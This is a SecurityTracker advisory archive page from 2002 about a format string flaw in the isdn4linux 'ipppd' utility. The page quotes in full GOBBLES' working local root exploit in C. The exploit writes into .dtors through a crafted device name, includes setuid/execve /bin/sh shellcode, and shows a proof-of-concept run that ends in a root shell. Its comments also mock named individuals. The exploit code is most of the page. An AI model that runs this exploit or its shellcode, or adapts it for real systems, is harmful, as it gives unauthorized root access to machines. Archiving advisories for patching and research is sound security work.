SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Generic)  >   ipppd Vendors:   isdn4linux.org
ISDN4Linux Utils 'ipppd' Server Format String Bug May Let Local Users Gain Root Privileges
SecurityTracker Alert ID:  1005012
SecurityTracker URL:  http://securitytracker.com/id/1005012
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 10 2002
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  

Description:   A vulnerability was reported in the 'ipppd' component of the isdn4linux utils package. A local user can execute arbitrary commands, possibly with root privileges.

GOBBLES issued an exploit for a format string vulnerability in 'ipppd'. It is reported that ipppd logs device strings using an unsafe syslog(3) function call. A local user can provide a devicename that is 256 bytes or longer to cause ipppd to log the string. By providing a specially crafted string, a local user can cause arbitrary code to be executed with elevated privileges.

On some distributions, including SuSE Linux 8.0, the application is installed with set user id (suid) root permissions. On some installations, only users in the 'dialout' group can call this program.

Demonstration exploit code is provided in the Source Message.
Impact:   A local user can execute arbitrary code on the system with elevated privileges, possibly including root privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.isdn4linux.de (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(SuSE Issues Fix) ISDN4Linux Utils 'ipppd' Server Format String Bug May Let Local Users Gain Root Privileges   (Sebastian Krahmer <krahmer@suse.de>)
SuSE has released a fix.


 Source Message Contents
Date:  Fri, 9 Aug 2002 15:54:32 -0700
Subject:  [VulnWatch] Local Root Exploit



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

/*
 * GOBBLES-own-ipppd.c -- local root on SuSE 8.0
 *
 * Random Defcon Quote:
 *  "Who hired Gary Coleman to play KF at defcon?"
 *   -Anonymous
 *
 * ipppd is part of the isdn4linux-utils package and
 * is part of the default install of many linux dists.
 *
 * It is installed suid root on suse 8.0 but can only
 * be run by users in group "dialout". Luckily this
 * is a default group that normal users get added to.
 *
 * Problem:
 *
 * Classical syslog(3) formatstring problem.
 *
 * ipppd will log device strings in the following manner:
 *
 * main.c:
 *
 * ...
 * syslog(LOG_NOTICE,devstr);  // HARD TO SPOT BUG
 * ...
 *
 * This code is normally only reached with a valid device string
 * but if you feed ipppd a devicename that is >= 256 bytes it
 * will merrily proceed to log this string using the faulty
 * syslog(3) call. Subsequently handing over root access to the machine.
 *
 *     GENERIC FORMATSTRING EXPLOITS ARE SUPER DUPER FUN
 *
 * We're surprised that format bugs are allowed in 7350linux, but no one
 * is perfect.  Finding format bugs is a difficult task, and should be left
 * to the professionals.  A little known fact -- Paul Vixie invented
 * insecure programming.  We wanted to get this bug squashed before some
 * "researcher" from snosoft.com discovered it and tried to make some money
 * off it.  Help us in our mission to eliminate the existance of format bugs
 * in code.
 *
 * Greets:
 *  -Mark Litchfield, for helping make defcon happen.  Thanks.
 *  -Blue Boar, for his brilliant input during the Defcon Ethics Roundtable
 *   Challenge (the finest moment of defcon X)
 *  -Dean Turner, who contrary to whatever might be said, GOBBLES is not
 *   afraid of.  http://www.infonexus.com/PIX/08.01.02--defcon10/46.jpg
 *  -Eric Hines of f8labs.com, congradulations on your promotion to stockboy
 *   at Circuit City.
 *  -dice, for continuing to support the blackhat world (thanks for buying
 *   a turkey breakfast)
 *  -stealth, for making fun of the super bug.
 *  -Brian McWilliams, for thinking he knows what's up.  Hoser.
 *
 * Be careful using the Compaq TestDrive Servers -- researchers from SnoSoft
 * have comprimised each and every one of those machines, and are rapidly
 * stealing other warez developed on these machines.  If you have also
 * worked with your perl -e techniques on these machines, and discovered some
 * locally exploitable stack overflows, your work may have been ripped off.
 * KF, the defcon stage, much like information security, is not for you.
 *
 * Please, help liberate dvdman!  Let him go back to maintaining
 * l33tsecurity.com, and stop raping his mind for less-than-minimum wage;
 * skill displayed on l33tsecurity.com shows this man knows what's up and
 * deserves to make a little more money, or return to the wild where he
 * can hack freely.  FREE DVDMAN!@#!@#
 *
 * (flashn has asked that the "hack.se is a bunch of nazis" statement from
 *  the defcon speech to be publically retracted and for an apology to be
 *  issued)
 *
 */
/*
 * PROOF OF CONCEPT ON DEFAULT SuSE 8.0 INSTALL:
 *
 * $ ./GOBBLES-own-ipppd -t 0x806c864
 * [*] target @ 0x806c868
 * [*] shellcode @ 0xbfffffb5
 * sh-2.05# id
 * uid=0(root) gid=100(users) groups=100(users)
 * sh-2.05#
 *
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define DPA		11
#define ALLIGN		3

#define IPPPD		"/usr/sbin/ipppd"
#define OBJDUMP		"/usr/bin/objdump"

void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
void stuff(void);

extern char **environ;
char string[260];

int
main(int argc, char **argv)
{
	int dpa, aln, shift = 0;
	char opt, *tmp;
	unsigned long t, w;

	if(argc == 1) {
		fprintf(stderr, "\nUsage: \n%s -t <.dtors address>\n\n"
				"Optional:\n\t-o <word offset>\n\t-a <allignment>\n\n"
				"For the lazy:\n\t-g spits out .dtors section (use standalone)\n\n"
				, argv[0]);
		exit(0);
	}

	aln = ALLIGN;
	dpa = DPA;

	while((opt = getopt(argc, argv, "t:o:a:g")) != EOF) {
		switch(opt) {
			case 't':
				sscanf(optarg, "%p", &tmp);
				t = (long)tmp;
			 	t += 4;
				break;
			case 'a':
				aln = atoi(optarg);
				break;
			case 'o':
				dpa = atoi(optarg);
				break;
			case 'g':
				fprintf(stderr, "[*] requested objdump, this will halt any exploitation\n");
				if(execl(OBJDUMP, "objdump", "-s", "-j", ".dtors", IPPPD, NULL)) {
					fprintf(stderr, "[*] error getting .dtors section, check paths\n");
					exit(1);
				}
			default:
				fprintf(stderr, "hehehe ;PppPPPpP\n");
				exit(0);
		}
	}

	tmp = NULL;

	if((tmp = getenv("GOBBLES")) == NULL) {
		stuff();
		if(execve(argv[0], argv, environ)) {
			fprintf(stderr, "[*] error re-executing\n");
			exit(1);
		}
	}

	w = (long)tmp;
	shift = (strlen(argv[0]) - strlen(IPPPD));
	w += shift;

	fprintf(stderr, "[*] target @ %p\n[*] shellcode @ %p\n", t, w);

	buildstring(t, w, dpa, aln);

	if(execl(IPPPD, "ipppd", string, NULL)) {
		fprintf(stderr, "[*] error executing\n");
		exit(1);
	}
}


void
buildstring(unsigned long t, unsigned long w, int dpa, int aln)
{
	char a_buf[4];
	unsigned int un, deux, x, len, b[4];

	memset(string, '\0', sizeof(string));
	memset(a_buf, '\0', sizeof(a_buf));

	for(x = 0; x < aln && x < sizeof(a_buf); x++)
		a_buf[x] = 'x';

	b[0] = (t & 0x000000ff);
	b[1] = (t & 0x0000ff00) >> 8;
	b[2] = (t & 0x00ff0000) >> 16;
	b[3] = (t & 0xff000000) >> 24;

	un = (w >> 16) & 0xffff;
	deux = w & 0xffff;

	if(un < deux) {
                snprintf(string, sizeof(string)-1,
			"%s"
			"%c%c%c%c%c%c%c%c"
			"%%.%hdx" "%%%d$hn"
			"%%.%hdx" "%%%d$hn",
                        a_buf,
			b[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3],
                        un - (8 + aln + 5), dpa,
			deux - un, dpa + 1
		);
        }
        else {
                snprintf(string, sizeof(string)-1,
			"%s"
			"%c%c%c%c%c%c%c%c"
			"%%.%hdx" "%%%d$hn"
			"%%.%hdx" "%%%d$hn",
                        a_buf,
			b[0], b[1], b[2], b[3], b[0]+2, b[1], b[2], b[3],
                        deux - (8 + aln + 5), dpa,
			un - deux, dpa + 1
		);
        }

	len = strlen(string);
	memset(&string[len], 'x', (sizeof(string)-len-1));
}


void
stuff(void)
{
        char code[] = // the setuid 0 with the execve of the /bin/sh
	"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
	"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
	"\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";  // In honor of Snosoft
						 // appreciate week, we
						 // too are using only
						 // Taeho Oh shellcode.
	setenv("GOBBLES", code, 1);
}


-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlwEARECABwFAj1UR9YVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPvNQA
oJ7ykXhxLAFI3diDIkN2RE/XfEdtAKC4hElIDesQgJZ6cQgZ/M6Qi4kiQQ==
=XIYS
-----END PGP SIGNATURE-----


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC